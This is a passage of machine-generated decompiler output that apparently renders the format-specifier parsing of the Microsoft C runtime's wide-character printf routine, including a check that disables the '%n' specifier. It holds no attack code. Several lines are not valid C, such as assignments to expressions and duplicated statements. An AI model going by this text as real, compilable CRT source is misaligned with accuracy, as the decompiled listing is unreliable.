    															if( *(_t525 - 0x4e0) > 7) {
    																continue;
    															}
    															L17:
    															switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00B97044))) {
    																case 0:
    																	L18:
    																	 *(_t525 - 0xc) = 1;
    																	E00B97150( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
    																	_t527 = _t527 + 0xc;
    																	goto L214;
    																case 1:
    																	L19:
    																	 *(__ebp - 0x2c) = 0;
    																	__ecx =  *(__ebp - 0x2c);
    																	 *(__ebp - 0x28) = __ecx;
    																	__edx =  *(__ebp - 0x28);
    																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																	__eax =  *(__ebp - 0x18);
    																	 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    																	 *(__ebp - 0x10) = 0;
    																	 *(__ebp - 0x30) = 0xffffffff;
    																	 *(__ebp - 0xc) = 0;
    																	goto L214;
    																case 2:
    																	L20:
    																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																	 *(__ebp - 0x4e4) = __ecx;
    																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																	 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																	__eflags =  *(__ebp - 0x4e4) - 0x10;
    																	if( *(__ebp - 0x4e4) > 0x10) {
    																		goto L27;
    																	}
    																	L21:
    																	_t57 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    																	__ecx =  *_t57 & 0x000000ff;
    																	switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    																		case 0:
    																			goto L24;
    																		case 1:
    																			goto L25;
    																		case 2:
    																			goto L23;
    																		case 3:
    																			goto L22;
    																		case 4:
    																			goto L26;
    																		case 5:
    																			goto L27;
    																	}
    																case 3:
    																	L28:
    																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																		__edx =  *(__ebp - 0x18);
    																		__edx =  *(__ebp - 0x18) * 0xa;
    																		__eflags = __edx;
    																		_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																		__ecx = __edx + _t81;
    																		 *(__ebp - 0x18) = __ecx;
    																	} else {
    																		__edx = __ebp + 0x14;
    																		 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x18);
    																		if( *(__ebp - 0x18) < 0) {
    																			__eax =  *(__ebp - 0x10);
    																			__eax =  *(__ebp - 0x10) | 0x00000004;
    																			__eflags = __eax;
    																			 *(__ebp - 0x10) = __eax;
    																			__ecx =  *(__ebp - 0x18);
    																			__ecx =  ~( *(__ebp - 0x18));
    																			 *(__ebp - 0x18) = __ecx;
    																		}
    																	}
    																	L33:
    																	goto L214;
    																case 4:
    																	L34:
    																	 *(__ebp - 0x30) = 0;
    																	goto L214;
    																case 5:
    																	L35:
    																	__edx =  *(__ebp - 0x454) & 0x0000ffff;
    																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    																	if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																		__ecx =  *(__ebp - 0x30);
    																		__ecx =  *(__ebp - 0x30) * 0xa;
    																		__eflags = __ecx;
    																		_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																		__eax = __ecx + _t92;
    																		 *(__ebp - 0x30) = __ecx + _t92;
    																	} else {
    																		__eax = __ebp + 0x14;
    																		 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x30);
    																		if( *(__ebp - 0x30) < 0) {
    																			 *(__ebp - 0x30) = 0xffffffff;
    																		}
    																	}
    																	goto L214;
    																case 6:
    																	L41:
    																	__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																	 *(__ebp - 0x4e8) = __ecx;
    																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																	 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																	__eflags =  *(__ebp - 0x4e8) - 0x2e;
    																	if( *(__ebp - 0x4e8) > 0x2e) {
    																		L64:
    																		goto L214;
    																	}
    																	L42:
    																	_t100 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    																	__ecx =  *_t100 & 0x000000ff;
    																	switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    																		case 0:
    																			L47:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
    																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    																				L50:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
    																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    																					L53:
    																					__ecx =  *(__ebp + 0xc);
    																					__edx =  *__ecx & 0x0000ffff;
    																					__eflags = ( *__ecx & 0x0000ffff) - 0x64;
    																					if(( *__ecx & 0x0000ffff) == 0x64) {
    																						L59:
    																						L61:
    																						goto L64;
    																					}
    																					L54:
    																					__eax =  *(__ebp + 0xc);
    																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																					__eflags = __ecx - 0x69;
    																					if(__ecx == 0x69) {
    																						goto L59;
    																					}
    																					L55:
    																					__edx =  *(__ebp + 0xc);
    																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
    																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																						goto L59;
    																					}
    																					L56:
    																					__ecx =  *(__ebp + 0xc);
    																					__edx =  *__ecx & 0x0000ffff;
    																					__eflags = ( *__ecx & 0x0000ffff) - 0x75;
    																					if(( *__ecx & 0x0000ffff) == 0x75) {
    																						goto L59;
    																					}
    																					L57:
    																					__eax =  *(__ebp + 0xc);
    																					__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																					__eflags = __ecx - 0x78;
    																					if(__ecx == 0x78) {
    																						goto L59;
    																					}
    																					L58:
    																					__edx =  *(__ebp + 0xc);
    																					__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																					__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
    																					if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																						 *(__ebp - 0x45c) = 0;
    																						goto L18;
    																					}
    																					goto L59;
    																				}
    																				L51:
    																				__eax =  *(__ebp + 0xc);
    																				__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																				__eflags = __ecx - 0x32;
    																				if(__ecx != 0x32) {
    																					goto L53;
    																				} else {
    																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																					goto L61;
    																				}
    																			}
    																			L48:
    																			__eax =  *(__ebp + 0xc);
    																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																			__eflags = __ecx - 0x34;
    																			if(__ecx != 0x34) {
    																				goto L50;
    																			} else {
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																				goto L61;
    																			}
    																		case 1:
    																			L62:
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00000020;
    																			 *(__ebp - 0x10) = __ecx;
    																			goto L64;
    																		case 2:
    																			L43:
    																			__edx =  *(__ebp + 0xc);
    																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
    																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    																				__eax =  *(__ebp - 0x10);
    																				__eax =  *(__ebp - 0x10) | 0x00000010;
    																				__eflags = __eax;
    																				 *(__ebp - 0x10) = __eax;
    																			} else {
    																				__ecx =  *(__ebp + 0xc);
    																				__ecx =  *(__ebp + 0xc) + 2;
    																				 *(__ebp + 0xc) = __ecx;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																			}
    																			goto L64;
    																		case 3:
    																			L63:
    																			__edx =  *(__ebp - 0x10);
    																			__edx =  *(__ebp - 0x10) | 0x00000800;
    																			__eflags = __edx;
    																			 *(__ebp - 0x10) = __edx;
    																			goto L64;
    																		case 4:
    																			goto L64;
    																	}
    																case 7:
    																	L65:
    																	__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																	 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    																	__ecx =  *(__ebp - 0x4ec);
    																	__ecx =  *(__ebp - 0x4ec) - 0x41;
    																	 *(__ebp - 0x4ec) = __ecx;
    																	__eflags =  *(__ebp - 0x4ec) - 0x37;
    																	if( *(__ebp - 0x4ec) > 0x37) {
    																		while(1) {
    																			L187:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L212;
    																			}
    																			goto L188;
    																		}
    																	}
    																	L66:
    																	_t141 =  *(__ebp - 0x4ec) + 0xb97110; // 0xcccccc0d
    																	__eax =  *_t141 & 0x000000ff;
    																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00B970D4))) {
    																		case 0:
    																			L120:
    																			 *(__ebp - 0x2c) = 1;
    																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																			 *(__ebp - 0x454) = __ax;
    																			goto L121;
    																		case 1:
    																			L67:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			__eflags =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				__edx =  *(__ebp - 0x10);
    																				__edx =  *(__ebp - 0x10) | 0x00000020;
    																				__eflags = __edx;
    																				 *(__ebp - 0x10) = __edx;
    																			}
    																			goto L69;
    																		case 2:
    																			L82:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			__eflags =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) | 0x00000020;
    																				__eflags = __ecx;
    																				 *(__ebp - 0x10) = __ecx;
    																			}
    																			goto L84;
    																		case 3:
    																			L143:
    																			 *(__ebp - 0x460) = 7;
    																			goto L145;
    																		case 4:
    																			L75:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x474) = E00B93D50(__ebp + 0x14);
    																			__eflags =  *(__ebp - 0x474);
    																			if( *(__ebp - 0x474) == 0) {
    																				L77:
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				L81:
    																				goto L187;
    																			}
    																			L76:
    																			__ecx =  *(__ebp - 0x474);
    																			__eflags =  *(__ecx + 4);
    																			if( *(__ecx + 4) != 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																				__eflags =  *(__ebp - 0x10) & 0x00000800;
    																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																					 *(__ebp - 0xc) = 0;
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__edx =  *__ecx;
    																					 *(__ebp - 0x24) =  *__ecx;
    																				} else {
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__eax =  *__ecx;
    																					asm("cdq");
    																					 *__ecx - __edx =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0xc) = 1;
    																				}
    																				goto L81;
    																			}
    																			goto L77;
    																		case 5:
    																			L121:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x44) = 0x200;
    																			__eflags =  *(__ebp - 0x30);
    																			if( *(__ebp - 0x30) >= 0) {
    																				L123:
    																				__eflags =  *(__ebp - 0x30);
    																				if( *(__ebp - 0x30) != 0) {
    																					L126:
    																					__eflags =  *(__ebp - 0x30) - 0x200;
    																					if( *(__ebp - 0x30) > 0x200) {
    																						 *(__ebp - 0x30) = 0x200;
    																					}
    																					L128:
    																					__eflags =  *(__ebp - 0x30) - 0xa3;
    																					if( *(__ebp - 0x30) > 0xa3) {
    																						__ecx =  *(__ebp - 0x30);
    																						__ecx =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																						__eflags =  *(__ebp - 0x20);
    																						if( *(__ebp - 0x20) == 0) {
    																							 *(__ebp - 0x30) = 0xa3;
    																						} else {
    																							__edx =  *(__ebp - 0x20);
    																							 *(__ebp - 4) =  *(__ebp - 0x20);
    																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																						}
    																					}
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					__edx =  *(__ebp + 0x14);
    																					__eax =  *(__edx - 8);
    																					__ecx =  *(__edx - 4);
    																					 *(__ebp - 0x490) =  *(__edx - 8);
    																					 *(__ebp - 0x48c) =  *(__edx - 4);
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__edx =  *(__ebp - 0x2c);
    																					_push( *(__ebp - 0x2c));
    																					__eax =  *(__ebp - 0x30);
    																					_push( *(__ebp - 0x30));
    																					__ecx =  *(__ebp - 0x454);
    																					_push( *(__ebp - 0x454));
    																					__edx =  *(__ebp - 0x44);
    																					_push( *(__ebp - 0x44));
    																					__eax =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__ecx = __ebp - 0x490;
    																					_push(__ebp - 0x490);
    																					__edx =  *0xd12188; // 0xddc09d6c
    																					E00B849C0(__edx) =  *__eax();
    																					__esp = __esp + 0x1c;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					__eflags =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																						__eflags =  *(__ebp - 0x30);
    																						if( *(__ebp - 0x30) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__ecx =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__edx =  *0xd12194; // 0xddc09d6c
    																							E00B849C0(__edx) =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																					__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																						__eflags =  *(__ebp - 0x10) & 0x00000080;
    																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__edx =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__eax =  *0xd12190; // 0xddc09d6c
    																							__eax =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__ecx =  *(__ebp - 4);
    																					__edx =  *( *(__ebp - 4));
    																					__eflags =  *( *(__ebp - 4)) - 0x2d;
    																					if( *( *(__ebp - 4)) == 0x2d) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						__ecx =  *(__ebp - 4);
    																						__ecx =  *(__ebp - 4) + 1;
    																						__eflags = __ecx;
    																						 *(__ebp - 4) = __ecx;
    																					}
    																					__edx =  *(__ebp - 4);
    																					 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																					do {
    																						L187:
    																						__eflags =  *(__ebp - 0x28);
    																						if( *(__ebp - 0x28) != 0) {
    																							goto L212;
    																						}
    																						goto L188;
    																					} while ( *(__ebp - 0x4ec) > 0x37);
    																					goto L66;
    																				}
    																				L124:
    																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    																					goto L126;
    																				}
    																				L125:
    																				 *(__ebp - 0x30) = 1;
    																				goto L128;
    																			}
    																			L122:
    																			 *(__ebp - 0x30) = 6;
    																			goto L128;
    																		case 6:
    																			L69:
    																			 *(__ebp - 0xc) = 1;
    																			__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x458) = __ax;
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) & 0x00000020;
    																			__eflags = __ecx;
    																			if(__ecx == 0) {
    																				__cx =  *(__ebp - 0x458);
    																				 *(__ebp - 0x448) = __cx;
    																			} else {
    																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    																				 *(__ebp - 0x470) = __dl;
    																				 *((char*)(__ebp - 0x46f)) = 0;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C680(__ebp - 0x40);
    																				__ecx = __ebp - 0x40;
    																				E00B7C680(__ebp - 0x40) =  *__eax;
    																				__ecx =  *(__ebp - 0x448 + 0xac);
    																				__edx = __ebp - 0x470;
    																				__eax = __ebp - 0x448;
    																				__eax = E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
    																				__eflags = __eax;
    																				if(__eax < 0) {
    																					 *(__ebp - 0x28) = 1;
    																				}
    																			}
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x24) = 1;
    																			while(1) {
    																				L187:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L212;
    																				}
    																				goto L188;
    																			}
    																		case 7:
    																			L141:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 8) = 0xa;
    																			goto L150;
    																		case 8:
    																			L106:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x484) = E00B93D50(__ebp + 0x14);
    																			__eax = E00B97280();
    																			__eflags = __eax;
    																			if(__eax != 0) {
    																				L116:
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) & 0x00000020;
    																				__eflags = __ecx;
    																				if(__ecx == 0) {
    																					__ecx =  *(__ebp - 0x484);
    																					__edx =  *(__ebp - 0x44c);
    																					 *__ecx =  *(__ebp - 0x44c);
    																				} else {
    																					__edx =  *(__ebp - 0x484);
    																					__ax =  *(__ebp - 0x44c);
    																					 *( *(__ebp - 0x484)) = __ax;
    																				}
    																				 *(__ebp - 0x28) = 1;
    																				while(1) {
    																					L187:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L212;
    																					}
    																					goto L188;
    																				}
    																			}
    																			L107:
    																			__ecx = 0;
    																			__eflags = 0;
    																			if(0 == 0) {
    																				 *(__ebp - 0x4f4) = 0;
    																			} else {
    																				 *(__ebp - 0x4f4) = 1;
    																			}
    																			__edx =  *(__ebp - 0x4f4);
    																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    																			__eflags =  *(__ebp - 0x488);
    																			if( *(__ebp - 0x488) == 0) {
    																				_push(L"(\"\'n\' format specifier disabled\", 0)");
    																				_push(0);
    																				_push(0x695);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				__eax = L00B7D760();
    																				__esp = __esp + 0x14;
    																				__eflags = __eax - 1;
    																				if(__eax == 1) {
    																					asm("int3");
    																				}
    																			}
    																			__eflags =  *(__ebp - 0x488);
    																			if( *(__ebp - 0x488) != 0) {
    																				L115:
    																				while(1) {
    																					L187:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L212;
    																					}
    																					goto L188;
    																				}
    																			} else {
    																				L114:
    																				 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																				__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																				 *(__ebp - 0x4cc) = 0xffffffff;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C650(__ecx);
    																				__eax =  *(__ebp - 0x4cc);
    																				goto L225;
    																			}
    																		case 9:
    																			L148:
    																			 *(__ebp - 8) = 8;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			__eflags =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__edx =  *(__ebp - 0x10);
    																				__edx =  *(__ebp - 0x10) | 0x00000200;
    																				__eflags = __edx;
    																				 *(__ebp - 0x10) = __edx;
    																			}
    																			L150:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x49c) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x4a0) = __eax;
    																							 *(__ebp - 0x49c) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x49c) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x49c) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L167;
    																			}
    																		case 0xa:
    																			goto L0;
    																		case 0xb:
    																			L84:
    																			__eflags =  *(__ebp - 0x30) - 0xffffffff;
    																			if( *(__ebp - 0x30) != 0xffffffff) {
    																				__edx =  *(__ebp - 0x30);
    																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    																			} else {
    																				 *(__ebp - 0x4f0) = 0x7fffffff;
    																			}
    																			__eax =  *(__ebp - 0x4f0);
    																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																			__eflags =  *(__ebp - 0x10) & 0x00000020;
    																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																				L98:
    																				__eflags =  *(__ebp - 4);
    																				if( *(__ebp - 4) == 0) {
    																					__ecx =  *0xd121a4; // 0xb77590
    																					 *(__ebp - 4) = __ecx;
    																				}
    																				 *(__ebp - 0xc) = 1;
    																				__edx =  *(__ebp - 4);
    																				 *(__ebp - 0x480) =  *(__ebp - 4);
    																				while(1) {
    																					L101:
    																					__eax =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c) - 1;
    																					 *(__ebp - 0x47c) = __ecx;
    																					__eflags =  *(__ebp - 0x47c);
    																					if( *(__ebp - 0x47c) == 0) {
    																						break;
    																					}
    																					L102:
    																					__edx =  *(__ebp - 0x480);
    																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																					__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																						break;
    																					}
    																					L103:
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																				}
    																				L104:
    																				__edx =  *(__ebp - 0x480);
    																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
    																				__eflags = __edx;
    																				 *(__ebp - 0x24) = __edx;
    																				goto L105;
    																			} else {
    																				L88:
    																				__eflags =  *(__ebp - 4);
    																				if( *(__ebp - 4) == 0) {
    																					__eax =  *0xd121a0; // 0xb775a0
    																					 *(__ebp - 4) = __eax;
    																				}
    																				__ecx =  *(__ebp - 4);
    																				 *(__ebp - 0x478) = __ecx;
    																				 *(__ebp - 0x24) = 0;
    																				while(1) {
    																					L92:
    																					__eax =  *(__ebp - 0x24);
    																					__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
    																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																						break;
    																					}
    																					L93:
    																					__ecx =  *(__ebp - 0x478);
    																					__edx =  *__ecx;
    																					__eflags =  *__ecx;
    																					if( *__ecx == 0) {
    																						break;
    																					}
    																					L94:
    																					__ecx = __ebp - 0x40;
    																					E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    																					__eax = E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
    																					__eflags = __eax;
    																					if(__eax != 0) {
    																						__edx =  *(__ebp - 0x478);
    																						__edx =  *(__ebp - 0x478) + 1;
    																						__eflags = __edx;
    																						 *(__ebp - 0x478) = __edx;
    																					}
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					__edx =  *(__ebp - 0x24);
    																					__edx =  *(__ebp - 0x24) + 1;
    																					__eflags = __edx;
    																					 *(__ebp - 0x24) = __edx;
    																				}
    																				L97:
    																				L105:
    																				while(1) {
    																					L187:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L212;
    																					}
    																					goto L188;
    																				}
    																			}
    																		case 0xc:
    																			L142:
    																			 *(__ebp - 8) = 0xa;
    																			while(1) {
    																				L150:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																				__eflags =  *(__ebp - 0x10) & 0x00008000;
    																				if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																					__eflags =  *(__ebp - 0x10) & 0x00001000;
    																					if(( *(__ebp - 0x10) & 0x00001000) == 0) {
